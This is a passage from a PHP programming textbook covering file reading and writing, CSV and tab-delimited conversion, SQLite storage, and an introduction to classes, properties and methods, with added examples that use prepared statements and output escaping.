by using the following statements: 

if(is_dir("c:/testdir")) 
{ 
    $fh = fopen("c:/testdir/file1.txt","w"); 
} 

With these statements, the fopen statement is executed only if the 
path/filename exists and is a directory. 

Opening files on another website 

You can also open a file on another website by using a statement such as the 
following: 

$fh = fopen("http://janet.valade.com/index.html","r"); 

You can use a URL only with a read mode, not with a write mode, and there 
are better ways to do this — namely, the cURL functions. See the PHP 
manual at http://php.net/manual/en/book.curl.php for more 
information on the cURL functions. 

Closing a file 

To close a file after you have finished reading or writing it, use the following 
statement: 

fclose($fh); 

In this statement, $fh is the file handle variable you created when you 
opened the file. 

Writing to a file 

After you open the file, you can write into it by using the fwrite statement, 
which has the following general format: 

fwrite($fh,datatosave); 

In this statement, $fh is the file handle that you created when you opened 
the file containing the pointer to the open file, and datatosave is the 
information to be stored in the file. The information can be a string or a variable. 
For example, you can use the following statements: 

$today = date("Y-m-d"); 
$fh = fopen("file2.txt","a"); 
fwrite($fh,"$today\n"); 
fclose($fh); 

These statements store the current date in a file called file2.txt. Notice 
that the file is opened in append mode (a). If the file doesn’t exist, it is 
created, and the date is written as the first line. If the file exists, the date is 
added to the end of the file. In this way, you create a log file that stores a list 
of the dates on which the script is run. The fwrite statement stores exactly 
what you send. After the fwrite statement executes twice, file2.txt 
contains: 

2013-10-22 
2013-10-22 

The dates appear on separate lines because the new line character (\n) is 
written to the file. 

Be sure to open the file with the a mode if you want to add information to a 
file. If you use a write mode, the file is overwritten each time it’s opened. 

Reading from a file 

You can read from a file by using the fgets statement, which has the following 
general format: 

$line = fgets($fh) 

In this statement, $fh holds the pointer to the open file. This statement reads 
a string until it encounters the end of the line or the end of the file, whichever 
comes first, and stores the string in $line. To read an entire file, you keep 
reading lines until you get to the end of the file. PHP recognizes the end of the 
file and provides a function feof to tell you when you reach the end of the 
file. The following statements read and display all the lines in the file: 

while(!feof($fh)) 
{ 
    $line = fgets($fh); 
    echo "$line"; 
} 

In the first line, feof($fh) returns true when the end of the file is reached. 

The exclamation point negates the condition being tested, so that the while 
statement continues to run as long as the end of the file isn’t reached. When 
the end of the file is reached, while stops. 

If you use these statements to read the log file created in the preceding 
section, you get the following output: 

2013-10-22 
2013-10-22 

As you can see, the new line character is included when the line is read. 
In some cases, you don’t want the end of line included. If so, you need to 
remove it by using the following statements: 

while(!feof($fh)) 
{ 
    $line = rtrim(fgets($fh)); 
    echo "$line"; 
} 

The rtrim function removes any trailing blank spaces and the new line 
character. The output from these statements is as follows: 

2013-10-222013-10-22 

Reading files piece by piece 

Sometimes you want to read strings of a certain size from a file. You can tell 
fgets to read a certain number of characters by using the following format: 

$line = fgets($fh,n) 

This statement tells PHP to read a string that is n-1 characters long until it 
reaches the end of the line or the end of the file. 

For example, you can use the following statements: 

while(!feof($fh)) 
{ 
    $char4 = fgets($fh,5); 
    echo "$char4\n"; 
} 

These statements read each four-character string until the end of the file. 
The output is as follows: 

2013 
-10- 
22 

2013 
-10- 
22 

Notice that there’s a new line at the end of each line of the file. 

Reading a file into an array 

It’s often handy to have the entire file in an array. You can do that with the 
following statements: 

$fh = fopen("file2.txt","r"); 
while(!feof($fh)) 
{ 
    $content[] = fgets($fh); 
} 
fclose($fh); 

The result is the array $content with each line of the file as an element of 
the array. The array keys are numbers. 

PHP provides a shortcut function for opening a file and reading the entire 
contents into an array, one line in each element of the array. The following 
statement produces the same results as the preceding five lines: 

$content = file("file2.txt"); 


The statement opens file2.txt, puts each line into an element of the array 
$content, and then closes the file. 



The file function can slow down your script if the file you’re opening 
is really large. How large depends on the amount of available computer 
memory. If your script seems slow, try reading the file with fgets rather 
than file and see whether that speeds up the script. 


You can direct the file function to automatically open files in your 
include directory (described in Chapter 2 of this minibook) by using the 
following statement: 


$content = file("file2.txt",1); 


The 1 tells PHP to look for file2.txt in the include directory rather than
in the current directory.


Reading a file into a string 

Sometimes putting the entire contents of a file into one long string can be 
useful. For example, you might want to send the file contents in an e-mail 
message. PHP provides a function for reading a file into a string, as follows: 

$content = file_get_contents("file2.txt",1); 


The file_get_contents function works the same as the file function, 
except that it puts the entire contents of the file into a string rather than an 
array. After this statement, you can echo $content as follows: 

echo $content; 

The output is the following: 

2013-10-22

2013-10-22 



The output appears on separate lines because the end-of-line characters are 
read and stored as part of the string. Thus, when you echo the string, you 
also echo the end-of-line characters, which start a new line. 

The file_get_contents function was introduced in version 4.3.0. It isn’t
available in older versions of PHP.

Exchanging Data with Other Programs

You might sometimes need to provide information to other programs or 
read information into PHP from other programs. Flat files are particularly 
useful for such a task, and we explain how to perform that kind of task here. 

Exchanging data in flat files 

Almost all software has the capability to read information from flat files or 
write information into flat files. For example, by default, your word processor 
saves your documents in its own format, which only the word processor can 
understand. However, you can choose to save the document in text format 
instead. The text document is a flat file containing text that can be read by 
other software. Your word processor can also read text files, even ones that 
were written by other software. 

When your PHP script saves information into a text file, the information can 
be read by any software that has the capability to read text files. For example, 
text files can be read by most word processing software. However, some 
software requires a specific format in the text file. For example, an address 
book software application might read data from a flat file but require the 
information to be in specified locations — for example, the first 20 characters 
in a line are read as the name, the next 20 characters are read as the street 
address, and so on. You need to know what format the software requires in 
a flat file. Then write the flat file in the correct format in your PHP script by 
using fwrite statements, as discussed in the section “Writing to a file,” 
earlier in this chapter. 

Exchanging data in comma-delimited format 

A comma-separated values (CSV) file — also called a comma-delimited file — 
is a common format used to transfer information between software programs. 

Understanding comma-delimited format 

A CSV file is used to transfer information that can be structured as a table, 
organized as rows and columns. For example, spreadsheet programs organize
data as rows and columns and can read and write CSV files. A CSV file is
also often used to transfer data between different database software, such as 
between MySQL and Microsoft Access. Many other software programs can 
read and write data in CSV files. 

A CSV file is organized with each row of the table on a separate line in the 
file, and the columns in the row are separated by commas. For example, an 
address book can be organized as a CSV file, as follows: 

John Smith,1234 Oak St.,Big City,OR,99999 
Mary Jones,5678 Pine St.,Bigger City,ME,11111 
Luis Rojas,1234 Elm St.,Biggest City,TX,88888 

Excel can read this file into a table with five columns. The comma signals the
end of one column and the start of the next.

Creating a comma-delimited file

The following PHP statements create the CSV file:

$address[] = "John Smith,1234 Oak St.,Big City,OR,99999";
$address[] = "Mary Jones,5678 Pine St.,Bigger City,ME,11111";
$address[] = "Luis Rojas,1234 Elm St.,Biggest City,TX,88888";
$fh = fopen("addressbook.txt","a");
for ($i=0;$i<3;$i++)
{
    fwrite($fh,$address[$i]."\n");
}
fclose($fh);


Reading a comma-delimited file

PHP can read the CSV file by using either the file or the fgets function, as
described in the section “Reading a file into an array,” earlier in this chapter.
However, PHP provides a function called fgetcsv that’s designed specifically
to read CSV files. When you use this function to read a line in a CSV file, the 
line is stored in an array, with each column entry in an element of the array. 
For example, you can use the function to read the first line of the address 
book CSV file, as shown here: 

$address = fgetcsv($fh,1000); 


In this statement, $fh is the file handle, and 1000 is the number of characters 
to read. To read an entire line, use a number of characters that is longer 
than the longest line. The result of this statement is an array, as follows: 


$address[0] = John Smith
$address[1] = 1234 Oak St.
$address[2] = Big City
$address[3] = OR
$address[4] = 99999

The CSV file works well for transferring data in many cases. However, if a
comma is part of the data, commas can’t be used to separate the columns. 
For example, suppose one of the data lines is this: 

Smith Company, Inc.,1234 Fir St.,Big City,OR,99999 

The comma in the company name would divide the data into two columns —
Smith Company in the first and Inc. in the second — making six columns
instead of five.

When the data contains commas, you can use a different character to separate
the columns. For example, tabs are commonly used to separate columns.
This file is called a tab-separated values (TSV) file, or a tab-delimited
file. You can write a tab-delimited file by storing "\t" rather than a comma
in the output file.

You can read a file containing tabs by specifying the column separator in the 
statement, as follows: 

$address = fgetcsv($fh,1000,"\t");

You can use any character to separate columns. 

The script in Listing 3-3 contains a function that converts any CSV file into a 
tab-delimited file. 


Listing 3-3: A Script That Converts a CSV File into a Tab-Delimited File 

<?php
/*  Script name: Convert
 *  Description: Reads in a CSV file and outputs a
 *               tab-delimited file. The CSV file must have a
 *               .csv extension.
 */
$myfile = "testing";                                        // ->7
function convert($filename)                                 // ->8
{
    if( @$fh_in = fopen("{$filename}.csv","r"))             // ->10
    {
        $fh_out = fopen("{$filename}.tsv","a");             // ->12
        while( !feof($fh_in))                               // ->13
        {
            $line = fgetcsv($fh_in,1024);                   // ->15
            // !$line also covers the false that fgetcsv returns at end of file
            if( !$line || $line[0] == "")                   // ->16
            {
                fwrite($fh_out,"\n");
            }
            else {                                          // ->20
                // Separator first: the reversed argument order was removed in PHP 8
                fwrite($fh_out,implode("\t",$line)."\n");   // ->21
            }
        }
        fclose($fh_in);
        fclose($fh_out);
    }
    else {                                                  // ->27
        echo "File doesn't exist\n";
        return false;
    }
    echo "Conversion completed!\n";
    return true;                                            // ->32
}
convert($myfile);                                           // ->34


The following points refer to the line numbers in Listing 3-3:

->7    This line defines the filename as testing.

->8    This line defines a function named convert() with one parameter,
       $filename.

->10   This line opens a file that has the filename that was passed to the
       function with a .csv extension. The file is opened in read mode.

       If the file is opened successfully, the conversion statements in the
       if block are executed. If the file isn’t found, the else block
       beginning on Line 27 is executed.

->12   This line opens a file that has the filename that was passed to
       the function with a .tsv extension. The file is opened in append
       mode. The file is in the current directory in this script. If the file is
       in another directory where you think there is any possibility the
       file might not open in write mode, use an if statement here to
       test whether the file opened and perform some action if it did not.

->13   This line starts a while loop that continues to the end of the file.

->15   This statement reads one line from the input file into the array
       $line. Each column entry is stored in an element of the array.

->16   This statement tests whether the line from the input file has any
       text on it. If the line doesn’t have any text, a new line character is
       stored in the output file. Thus, any empty lines in the input file are
       stored in the output file.

->20   If the line from the input file isn’t empty, it’s converted to a
       tab-delimited format and written into the output file.

->21   This statement converts the line and writes it to the output file in
       one statement. The implode function converts the array $line
       into a string, with the elements separated by a tab.

->27   This else block executes when the input file can’t be found. An
       error message is echoed, and the function returns false.

->32   The function has completed successfully, so it returns true.

->34   This line calls the function, passing a filename to the function in
       the variable $myfile.
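
The comma-in-the-data problem described before Listing 3-3 can also be handled by quoting the fields instead of changing the delimiter. The following is an added example, not code from the book: it writes the rows with fputcsv, which quotes any field containing the delimiter, and converts the file to tab-delimited form without losing a field that itself contains a tab. The sample rows and temporary files are constructed, and the empty escape argument assumes PHP 7.4 or later.

```php
<?php
// Added example, not from the book. Sample rows and temp files are constructed.
// Assumes PHP 7.4 or later (the empty $escape argument).

/** Write rows to a delimited file; fputcsv() quotes the fields that need it. */
function writeRows(string $path, array $rows, string $delimiter = ","): void
{
    $fh = fopen($path, "w");
    if ($fh === false) {
        throw new RuntimeException("Cannot open $path for writing");
    }
    foreach ($rows as $row) {
        // A field containing the delimiter, a double quote or a line break is
        // wrapped in double quotes; embedded double quotes are doubled.
        if (fputcsv($fh, $row, $delimiter, '"', "") === false) {
            fclose($fh);
            throw new RuntimeException("Write to $path failed");
        }
    }
    fclose($fh);
}

/** Read every non-blank row of a delimited file into an array of arrays. */
function readRows(string $path, string $delimiter = ","): array
{
    $fh = fopen($path, "r");
    if ($fh === false) {
        throw new RuntimeException("Cannot open $path for reading");
    }
    $rows = [];
    // Looping on the return value stops cleanly at end of file, where
    // fgetcsv() returns false.
    while (($row = fgetcsv($fh, 0, $delimiter, '"', "")) !== false) {
        if ($row === [null]) {
            continue;                       // blank line in the file
        }
        $rows[] = $row;
    }
    fclose($fh);
    return $rows;
}

// Constructed sample data: a comma, double quotes and a tab inside fields.
$rows = [
    ["Smith Company, Inc.", "1234 Fir St.", "Big City", "OR", "99999"],
    ["Mary \"MJ\" Jones", "5678 Pine St.\tApt 2", "Bigger City", "ME", "11111"],
];

$csv = tempnam(sys_get_temp_dir(), "csv");
$tsv = tempnam(sys_get_temp_dir(), "tsv");

writeRows($csv, $rows);                     // comma-delimited, quoted as needed
echo file_get_contents($csv);

writeRows($tsv, readRows($csv), "\t");      // CSV to tab-delimited conversion
$roundTrip = readRows($tsv, "\t");

foreach ($roundTrip as $i => $row) {
    printf("row %d: %d columns, first column: %s\n", $i, count($row), $row[0]);
}
if ($roundTrip !== $rows) {
    throw new RuntimeException("Round trip changed the data");
}

unlink($csv);
unlink($tsv);
```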

Using SQLite

Beginning with PHP 5.0, PHP includes the SQLite software by default. SQLite 
is designed to store data in a flat file using SQL queries. (SQL is explained in 
Book V, Chapter 1.) 

SQLite is a quick, easy way to store data in a flat file. However, it’s less 
secure than a database and can’t handle complex data. In most cases, you 
should store your data in MySQL, but you occasionally might want to store 
your data in a flat file. For example, you might want to write the data in a 
format that can be read by another program, such as Excel. 

Storing and retrieving data with SQLite is similar to the methods described 
in Book V for using MySQL with PHP. You use SQL to communicate with the 
data file and use PHP functions to send the SQL and retrieve the data. You 
interact with the data by using the same steps that you use with a database, 
as follows: 

1. Connect to the data file.

2. Send an SQL query. 

3. If you retrieved data from the data file, process the data. 

4. Close the connection to the data file. 

Here are more details on how to complete each of those steps. 

To connect to the data file, use the following PHP function: 

$db = sqlite_open("testdb"); 

This statement opens the data file testdb. If the file doesn’t exist, the
function creates it.

To send an SQL query, use the sqlite_query function, as follows: 

$sql = "SELECT * FROM Product";
$result = sqlite_query($db,$sql);

The retrieved data is stored in a temporary table in rows and columns. You 
can use PHP functions to retrieve one row from the temporary data table 
and store it in an array, with the field names as the array keys. The
statement is as follows:

$row = sqlite_fetch_array($result);

After this statement, $row is an array containing all the fields in the
temporary table, such as the following:

$row['firstName'] = John 
$row['lastName'] = Smith 

To process all the data in the temporary table, you can use a loop to get one 
row at a time, processing each row until the end of the table is reached, as 
follows: 

// SQLITE_ASSOC returns each field once, keyed by its field name
while($row = sqlite_fetch_array($result,SQLITE_ASSOC))
{
    foreach($row as $value)
    {
        echo "$value<br />";
    }
}

When you finish storing and/or retrieving data, you can close the data file 
with the following statement: 

sqlite_close($db); 

Error handling for SQLite is similar to MySQL error handling, as explained in 
Book V, Chapter 5. Also, as discussed in that chapter, when the query fails, 
an SQLite error message is generated, but not displayed unless you use a 
function developed specifically to display it. Thus, the following statements 
handle errors in addition to sending the SQL query: 


$sql = "SELECT * FROM Product";
$result = sqlite_query($db,$sql)
    or die("Query failed: ".sqlite_error_string(sqlite_last_error($db)));
$row = sqlite_fetch_array($result);

Most of the information in Book V about MySQL applies to the use of SQLite 
as well. What makes SQLite different is that the data is stored in a flat file, 
rather than stored by MySQL in files that are unique to MySQL. 
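
The sqlite_open, sqlite_query, and related functions shown above belong to the SQLite 2 extension, which was removed from PHP in version 5.4. The following is an added example, not code from the book: it performs the same four steps with PDO's SQLite driver, sends values as bound parameters rather than building them into the SQL string, and escapes each value before echoing it into HTML. The Product table, its columns, and the sample rows are constructed.

```php
<?php
// Added example, not from the book. Requires the pdo_sqlite extension.
// The Product table, its columns and the sample rows are constructed.

/** Step 1: connect to the data file (SQLite creates it if it is empty). */
function openDataFile(string $path): PDO
{
    $db = new PDO("sqlite:" . $path);
    // A failed query throws PDOException instead of returning false.
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Rows come back as arrays keyed by field name only.
    $db->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC);
    return $db;
}

/** Steps 2 and 3: send a query with a bound value and collect the rows. */
function productsUnder(PDO $db, $maxPrice): array
{
    $stmt = $db->prepare(
        "SELECT name, price FROM Product WHERE price < :max ORDER BY name"
    );
    $stmt->execute([":max" => $maxPrice]);
    return $stmt->fetchAll();
}

$path   = tempnam(sys_get_temp_dir(), "testdb");
$db     = null;
$insert = null;

try {
    $db = openDataFile($path);
    $db->exec("CREATE TABLE Product (name TEXT NOT NULL, price REAL NOT NULL)");

    // Constructed rows; the first name contains a quote and HTML markup.
    $sample = [
        ["Joe's <b>best</b> widget", 9.95],
        ["Gadget", 24.50],
        ["Gizmo", 4.25],
    ];
    $insert = $db->prepare(
        "INSERT INTO Product (name, price) VALUES (:name, :price)"
    );
    foreach ($sample as $product) {
        $insert->execute([":name" => $product[0], ":price" => $product[1]]);
    }

    foreach (productsUnder($db, 10) as $row) {
        foreach ($row as $value) {
            // Escape on output so stored markup is displayed, not interpreted.
            echo htmlspecialchars((string) $value, ENT_QUOTES, "UTF-8"), "<br />\n";
        }
    }
} catch (PDOException $e) {
    // Keep the detailed message in the log; show the visitor a generic one.
    error_log("Query failed: " . $e->getMessage());
    echo "Sorry, the data could not be read.\n";
} finally {
    // Step 4: dropping the last references closes the connection.
    $insert = null;
    $db     = null;
    unlink($path);
}
```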

In This Chapter

Understanding object-oriented programming
Planning an object-oriented script
Defining and writing classes
Dealing with errors by using exceptions
Copying, comparing, and destroying objects


Object-oriented programming (OOP) is an approach to programming that
uses objects and classes. It’s in widespread use today, with many universities
teaching object-oriented programming in beginning programming
classes. Currently, Java and C++ are prevalent languages used for
object-oriented programming.


Object-oriented programming, with a limited feature set, is possible in PHP 4. 
With PHP 5, the object-oriented capabilities of PHP were greatly improved, with 
both more speed and added features. The information and sample scripts in 
this chapter are written for PHP 5. Features that aren’t available in PHP 4 are 
noted. 


This chapter introduces object-oriented programming with a specific focus 
on how to use OOP concepts as they apply to PHP. 


Introducing Object-Oriented Programming 

Object-oriented programming, sometimes shortened to OOP, isn’t just a 
matter of using different syntax. It’s a different way of analyzing programming
problems. The application is designed by modeling the programming
problem. For example, a programmer designing an application to support 
a company’s sales department might look at the programming project in 
terms of the relationships between customers and sales and credit lines — 
in other words, in terms of the design of the sales department itself. 

In object-oriented programming, the elements of a script are objects. The 
objects represent the elements of the problem your script is meant to solve. 
For example, if the script is related to a used-car lot, the objects are probably
cars and customers. Or if the script is related to outer space, the objects 
would probably be stars and planets. 

Object-oriented programming developed new concepts and new terminology 
to represent those concepts. Understanding the terminology is the road to 
understanding object-oriented programming, and we explain that terminology 
to you here. 

Objects and classes 

The basic elements of object-oriented programs are objects. It’s easiest to 
understand objects as physical objects. For example, a car is an object. A car 
has properties (also called attributes), such as color, model, engine, and tires.
A car has things it can do, too, such as move forward, move backward, park, 
roll over, and play dead (well, ours does anyway). 

In general, objects are nouns. A person is an object. So are animals, houses, 
offices, garbage cans, coats, clouds, planets, and buttons. However, objects 
are not just physical objects. Like nouns, objects often are more conceptual. 
For example, a bank account isn’t something you can hold in your hand, but 
it can be considered an object. So can a computer account or a mortgage. A 
file is often an object. So is a database. E-mail messages, addresses, songs,
TV shows, meetings, and dates can all be objects. Objects in web applications
might be catalogs, catalog items, shopping carts, customers, orders, or
customer lists.

A class is the PHP code that serves as the template, or the pattern, that is 
used to create an object. The class defines the properties, the attributes, of 
the object. It also defines the things the object can do — its responsibilities. 
For example, you write a class that defines a car as four wheels and an engine, 
and the class lists the things a car can do, such as move forward and park. 
Then, given that class, you can write a statement similar to the following 
that creates a car object: 

$myCar = new Car(); 

The object $myCar is created from the definition in the class Car. Your
new car has four wheels and an engine and can move forward and park, as 
defined in the class Car. When you use your car object $myCar, you might 
find that it’s missing a few important things, such as a door, or a steering 
wheel, or a reverse gear. That’s because you left an important item out of 
the class Car when you wrote it. 

From a more technical point of view, an object is a complex, user-defined data 
type. The process of creating an object from a class is called instantiation. An 
object is an instance of a class. For instance, $myCar is an instance of the 
class Car. 

As the person who writes a class, you know how things work inside the
class. However, the person who uses an object created from the class
doesn’t need to know how an object accomplishes its responsibilities. Most
people have no clue how a telephone object works, but they can use it to
make a phone call. The person who built the telephone knows what’s happening
inside it. When there’s new technology, the phone builder can open
a phone and improve it. As long as he doesn’t change the interface — the
keypad and buttons — it doesn’t affect the use of the phone at all.

Properties 

Objects have properties, also sometimes called attributes. A car may be red, 
green, or covered in polka dots — a color property. Properties — such as 
color, size, or model for a car — are stored inside the object. Properties are 
set up in the class as variables. For example, the color attribute is stored in 
the object in a variable, given a descriptive name such as $color. Thus, the 
car object $myCar might contain $color = red. 

The variables that store properties can have default values, can be given 
values when the object is created, or values can be added or modified later. 
For example, a $myCar object is created red, but when it’s painted later, the
$color property is changed to chartreuse. 

Methods

The things objects can do are sometimes referred to as responsibilities. For 
example, a Car object can move forward, stop, back up, and park. Each thing 
an object can do — each responsibility — is programmed into the class and 
called a method. 

In PHP, methods use the same syntax as functions. Although the code looks
like the code for a function, the distinction is that methods are inside a class.
A method can’t be called independently of an object. PHP won’t allow it. This
type of function can perform its task only when called with an object.

When creating methods, give them names that are descriptive of what they 
do. For instance, a customerOrder class might have methods such as 
displayOrder, getTotalCost, computeSalesTax, and cancelOrder. 
Methods, like other PHP entities, can be named with any valid name, but 
they’re often named with camel caps, by convention, as shown here. 

The methods are the interface between the object and the rest of the world. 
The object needs methods for all its responsibilities. Objects should interact
with the outside world only through their methods. For example, suppose 
your object is a catalogitem that is for sale. One of its properties is $price. 
You don’t want $price to be easily changed by a simple statement, such as 

Instead, you want a method, called changePrice, that is the only way the
price can be edited. The method includes checks to be sure that only legitimate
users can use it to change the price.
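
One way such a changePrice method could look, as an added example that is not code from the book: the price is a private property, so a direct assignment from the script is rejected, and the method checks both the caller and the new value before changing it. The User class, the "catalog_admin" role, and the price rules are hypothetical.

```php
<?php
// Added example, not from the book. The User class, the "catalog_admin"
// role and the price rules are hypothetical.

class User
{
    private $name;
    private $roles;

    public function __construct(string $name, array $roles)
    {
        $this->name  = $name;
        $this->roles = $roles;
    }

    public function getName(): string
    {
        return $this->name;
    }

    public function hasRole(string $role): bool
    {
        return in_array($role, $this->roles, true);
    }
}

class CatalogItem
{
    private $name;
    private $price;   // private: no statement outside the class can assign it

    public function __construct(string $name, $price)
    {
        $this->name  = $name;
        $this->price = self::checkedPrice($price);
    }

    public function getPrice(): float
    {
        return $this->price;
    }

    /** The only way to edit the price: checks the caller, then the value. */
    public function changePrice(User $user, $newPrice): void
    {
        if (!$user->hasRole("catalog_admin")) {
            throw new RuntimeException($user->getName() . " may not change prices");
        }
        $this->price = self::checkedPrice($newPrice);
    }

    private static function checkedPrice($price): float
    {
        if (!is_numeric($price) || !is_finite((float) $price) || $price < 0) {
            throw new InvalidArgumentException("Price must be a non-negative number");
        }
        return round((float) $price, 2);
    }
}

$item  = new CatalogItem("Garden hose", 19.99);
$clerk = new User("pat", ["sales"]);
$admin = new User("lee", ["sales", "catalog_admin"]);

// Four attempts to change the price; only the last one should succeed.
$attempts = [
    "direct assignment" => function () use ($item) { $item->price = 0.01; },
    "clerk"             => function () use ($item, $clerk) { $item->changePrice($clerk, 0.01); },
    "admin, bad value"  => function () use ($item, $admin) { $item->changePrice($admin, "free"); },
    "admin"             => function () use ($item, $admin) { $item->changePrice($admin, "17.5"); },
];

foreach ($attempts as $label => $attempt) {
    try {
        $attempt();
        $outcome = "accepted";
    } catch (Throwable $e) {
        $outcome = "rejected (" . $e->getMessage() . ")";
    }
    printf("%-18s %s; price is now %.2f\n", $label . ":", $outcome, $item->getPrice());
}
```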

A good object should contain all it needs to perform its responsibilities, but 
not a lot of extraneous data. It shouldn’t perform actions that are another 
object’s responsibility. The car object should travel and should have everything
it needs to perform its responsibilities, such as gas, oil, tires, engine,
and so on. The car object shouldn’t cook and doesn’t need to have salt or 
frying pans. Nor should the cook object carry the kids to soccer practice. 


Inheritance 

Objects should contain only the properties and methods they need. No 
more. No less. One way to accomplish that is to share properties and methods
between classes by using inheritance. For example, suppose you have
two rose objects: one with white roses and one with red roses. You could 
write two classes: a redRose class and a whiteRose class. However, a lot 
of the information is the same for both objects. Both are bushes, both are 
thorny, and both bloom in June. Inheritance enables you to eliminate the 
duplication. 

You can write one class called Rose. You can store the common information 
in this class, such as $plant = bush, $stem = thorns, and $blooms =
June. Then you can write subclasses for the two rose types. The Rose class 
is called the master class or the parent class. redRose and whiteRose are 
the subclasses, which are referred to as child classes (or the kids, as a favorite
professor fondly referred to them).

Child classes inherit all the properties and methods from the parent class. 
But they can also have their own individual properties, such as $color = 
white for the whiteRose class and $color = red for the redRose class. 



A child class can contain a method with the same name as a method in a 
parent class. In that case, the method in the child class takes precedence 
for a child object. You can specify the method in the parent class for a child 
object if you want, but if you don’t, the child class method is used. 

Some languages allow a child class to inherit from more than one parent 
class, called multiple inheritance. PHP doesn’t allow multiple inheritance.
A class can inherit from only one parent class.


Developing an Object-Oriented Script

Object-oriented scripts require a lot of planning. You need to plan your objects 
and their properties and what they can do. Your objects need to cover all 
their responsibilities without encroaching on the responsibilities of other 
objects. For complicated projects, you might have to do some model building
and testing before you can feel reasonably confident that your project plan 
includes all the objects it needs. 

Developing object-oriented scripts includes the following procedures, which 
the next sections cover in more detail: 

1. Choose the objects.

2. Choose the properties and methods for each object.

3. Create the object and put it to work.

Choosing objects 

Your first task is to develop the list of objects needed for your programming 
project. If you’re working alone and your project is small, the objects might 
be obvious. However, if you’re working on a large, complex project, selecting 
the list of objects can be more difficult. For example, if your project is developing
the software that manages all the tasks in a bank, your list of possible
objects is large: account, teller, money, checkbook, wastebasket, guard, 
vault, alarm system, customer, loan, interest, and so on. But, do you need 
all those objects? What is your script going to do with the wastebasket in 
the front lobby? Or the guard? Well, perhaps your script needs to schedule 
shifts for the guards. 

When you’re planning object-oriented programs, the best strategy for identifying
your objects is to list all the objects you can think of — that is, all the
nouns that might have anything at all to do with your project. Sometimes
programmers can take all the nouns out of the project proposal documentation
to develop a pretty comprehensive list of possible objects.

After you create a long list of possible objects, your next task is to cross off 
as many as possible. You should eliminate any duplicates, objects that have 
overlapping responsibilities, and objects that are unrelated to your project. 
For example, if your project relates to building a car, your car project probably
needs to have objects for every part in the car. On the other hand, if
your project involves traffic control in a parking garage, you probably need 
only a car object that you can move around; the car’s parts don’t matter for 
this project. 

Selecting properties and methods for each object

When you have a comprehensive list of objects, you can begin to develop
the list of properties for each object. Ask yourself what you need to know
about each object. For example, for a car repair project, you probably need 
to know things like when the car was last serviced, its repair history, any 
accidents, details about the parts, and so on. For a project involving parking 
garage traffic, you probably need to know only the car’s size. How much 
room does the car take up in the parking garage? 

You need to define the responsibilities of each object, and each object needs
to be independent. It needs methods for actions that handle all of its responsibilities.
For example, if one of your objects is a bank account, you need to
know what a bank account needs to do. Well, first, it needs to be created,
so you can define an openNewAccount method. It needs to accept deposits
and disburse withdrawals. It needs to keep track of the balance. It needs to 
report the balance when asked. It might need to add interest to the account 
periodically. Such activities come to mind quickly. 

However, a little more thought, or perhaps testing, can reveal activities that 
you overlooked. For example, the account stores information about its owner, 
such as name and address. Did you remember to include a method to update 
that information when the customer moves? It might seem trivial compared to
moving the money around, but it won’t seem trivial if you can’t do it. 

Creating and using an object

After you decide on the design of an object, you can create and then use the 
object. The steps for creating and using an object are as follows: 

1. Write the class statement. 

The class statement is a PHP statement that is the blueprint for the 
object. The class statement has a statement block that contains PHP 
code for all the properties and methods that the object has. 

2. Include the class in the script where you want to use the object. 

You can write the class statement in the script itself. However, it’s 
more common to save the class statement in a separate file and use an 
include statement to include the class at the beginning of the script
that needs to use the object. 

3. Create an object in the script. 

You use a PHP statement to create an object based on the class. This is 
called instantiation. 

4. Use the new object.

After you create a new object, you can use it to perform actions. You can 
use any method that is inside the class statement block. 

The rest of this chapter provides the details needed to complete these steps. 


Defining a Class 

After you’ve determined the objects, properties, and methods your project 
requires, you’re ready to define classes. The class is the template (pattern) 
for the object. 

Writing a class statement

You write the class statement to define the properties and methods for the 
class. The class statement has the following general format: 

class className 
{ 


Add statements that define the properties 
Add all the methods 

} 

You can use any valid PHP identifier for the class name, except the name 
stdClass. PHP uses the name stdClass internally, so you can’t use this 
name. 

All the property settings and method definitions are enclosed in the opening 
and closing curly braces. If you want a class to be a subclass that inherits 
properties and methods, use a statement similar to the following: 

class whiteRose extends Rose 
{ 

Add the property statements 
Add the methods 

} 

The object created from this class has access to all the properties and methods
of both the whiteRose child class and the Rose class. The Rose class,
however, doesn’t have access to properties or methods in the child class, 
whiteRose. Imagine, the child owns everything the parent owns, but the 
parent owns nothing of the child’s. What an idea. 

The next few sections show you how to set properties and define methods 
within the class statement. For a more comprehensive example of a complete
class statement, see the section, “Putting it all together,” later in this
chapter. 

Setting properties 

When you’re defining a class, you declare all the properties at the top of the 
class, as follows: 

class Car 
{ 

private $color; 
private $tires; 
private $gas; 

Method statements 

} 





PHP doesn’t require you to declare variables. In the other PHP scripts discussed
in this book, variables aren’t declared; they’re just used. You can do
the same thing in a class. However, it’s much better to declare the properties
in a class. By including declarations, classes are much easier to understand.
It’s poor programming practice to leave this out.


Each property declaration begins with a keyword that specifies how the 
property can be accessed. The three keywords are 



♦ public: The property can be accessed from outside the class, either by 
the script or from another class. 

♦ private: No access is granted from outside the class, either by the 
script or from another class. 

♦ protected: No access is granted from outside the class except from a 
class that’s a child of the class with the protected property or method. 

Classes should be written so that methods are used to access properties. By 
declaring a property to be private, you make sure that the property can’t be 
accessed directly from the script. 

If you want to set default values for the properties, you can, but the values 
allowed are restricted. You can declare a simple value, but not a computed 
one, as detailed in the following examples: 


♦ The following variable declarations are allowed as default values:

private $color = "black"; 
private $gas = 10; 
private $tires = 4; 

♦ The following variable declarations are not allowed as default values: 

private $color = "blue"." black"; 
private $gas = 10 - 3; 
private $tires = 2*2;


An array is allowed in the variable declaration, as long as the values are 
simple, as follows: 

private $doors = array("front","back"); 


To set or change a variable’s value when you create an object, use the constructor
(described in the “Writing the constructor” section, later in this
chapter) or a method you write for this purpose. 


Accessing properties using $this

Inside a class, $this is a special variable that refers to the properties of the 
same class. $this can’t be used outside of a class. It’s designed to be used 
in statements inside a class to access variables inside the same class. 

The format for using $this is the following:

$this->varname

For example, in a CustomerOrder class that has a property $totalCost, 
you would access $totalCost in the following way: 

$this->totalCost 

Using $this refers to $totalCost inside the class. You can use $this as 
shown in any of the following statements: 

$this->totalCost = 200.25; 
if($this->totalCost > 1000) 

$product[$this->size] = $price;

As you can see, you use $this->varname in all the same ways you would
use $varname.

Notice that a dollar sign ($) appears before this but not before totalCost.
Don’t use a dollar sign before totalCost — as in $this->$totalCost —
because it changes your statement’s meaning. You might or might not get an
error message, but it isn’t referring to the variable $totalCost inside the
current class.

Adding methods 

